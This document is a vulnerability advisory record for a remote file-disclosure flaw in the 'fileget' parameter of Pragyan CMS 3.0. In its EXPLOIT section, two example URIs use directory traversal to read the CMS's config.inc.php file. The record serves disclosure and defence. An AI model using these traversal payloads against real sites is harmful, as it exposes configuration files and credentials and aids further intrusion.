Details of VAR-E-201201-0906

ID

VAR-E-201201-0906

TITLE

Pragyan CMS 'fileget' Parameter Remote File Disclosure Vulnerability

Trust: 0.3

sources: BID: 51360

DESCRIPTION

Pragyan CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks.
Pragyan CMS 3.0 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 51360

AFFECTED PRODUCTS

vendor:

pragyan

model:

cms pragyan cms

scope:

version:

3.0

Trust: 0.3

sources: BID: 51360

EXPLOIT

Attackers can exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
http://www.example.com/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php

Trust: 0.3

sources: BID: 51360

PRICE

Free

Trust: 0.3

sources: BID: 51360

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 51360

CREDITS

Or4nG.M4N

Trust: 0.3

sources: BID: 51360

EXTERNAL IDS

db:

BID

id:

51360

Trust: 0.3

sources: BID: 51360

REFERENCES

url:

http://sourceforge.net/projects/pragyan/

Trust: 0.3

sources: BID: 51360

SOURCES

db:

BID

id:

51360

LAST UPDATE DATE

2022-07-27T09:33:06.362000+00:00

SOURCES UPDATE DATE

db:

BID

id:

51360

date:

2012-01-10T00:00:00

SOURCES RELEASE DATE

db:

BID

id:

51360

date:

2012-01-10T00:00:00